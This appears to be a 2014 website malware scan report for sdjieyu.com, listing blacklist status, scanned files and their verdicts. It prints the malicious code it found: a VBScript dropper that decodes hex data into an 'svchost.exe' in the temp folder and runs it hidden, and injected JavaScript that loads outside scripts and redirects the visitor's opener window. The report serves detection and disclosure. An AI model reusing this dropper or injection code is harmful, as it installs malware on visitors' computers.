Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sdjieyu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.sdjieyu.com/ | HTTP/1.1 200 OK Date: Fri, 04 Jul 2014 17:18:32 GMT Accept-Ranges: bytes ETag: W/"947ad2c3dd92cf1:2a5b" Server: Microsoft-IIS/6.0 Content-Length: 140378 Content-Location: http://www.sdjieyu.com/index.htm Content-Type: text/html Last-Modified: Sat, 28 Jun 2014 14:32:18 GMT X-Powered-By: ASP.NET | clean |
http://www.sdjieyu.com/index.htm | 200 OK Content-Length: 140378 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "http://www.sdjieyu.com/svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.sdjieyu.com/75.gif | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/775.gif | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/30ps_neirong_08.jpg | 200 OK Content-Length: 607 Content-Type: image/jpeg | suspicious |
Page code contains blacklisted domain: www.365zhukao.com var url = location.href;
if (url.indexOf('http://') == 0 || url.indexOf('https://') == 0) { document.writeln("<script src="index-1.htm" tppabs="http://www.365zhukao.com/index.htm"http://www.182ok.com/75base.js/""></script>"); window.onload=function(){if(top!=self){f=document.createElement('form');f.action=location;f.target='_parent';document.body.appendChild(f);f.submit();}}; function bingo(){if(parent.window.opener) parent.window.opener.location='http://www.975f.com/?76';if(window.opener.parent.navigate) window.opener.parent.navigate('http://www.975f.com/?76');} setTimeout('bingo()', 8000); } | ||
http://www.sdjieyu.com/index-1.htm | 200 OK Content-Length: 140476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "http://www.365zhukao.com/svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3584 bytes skipped]... Antivirus reports:
| ||
http://www.sdjieyu.com/ħ½çÖÁ×ðÍò½Ù.rar | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sf70.com/superexitpopup.js | 500 Can't connect to www.sf70.com:80 Content-Length: 187 Content-Type: text/plain | clean |
http://www.021pay.com/tools/advcode.ashx?g=11369&pic=pay6 | 200 OK Content-Length: 1870 Content-Type: text/javascript | clean |
http://www.021pay.com/tools/statcode.ashx?u=507&s=t | 200 OK Content-Length: 238 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sdjieyu.com
Result:
GET / HTTP/1.1
Host: sdjieyu.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: sdjieyu.com
Referer: http://www.google.com/search?q=sdjieyu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sdjieyu.com
Referer: http://www.google.com/search?q=sdjieyu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.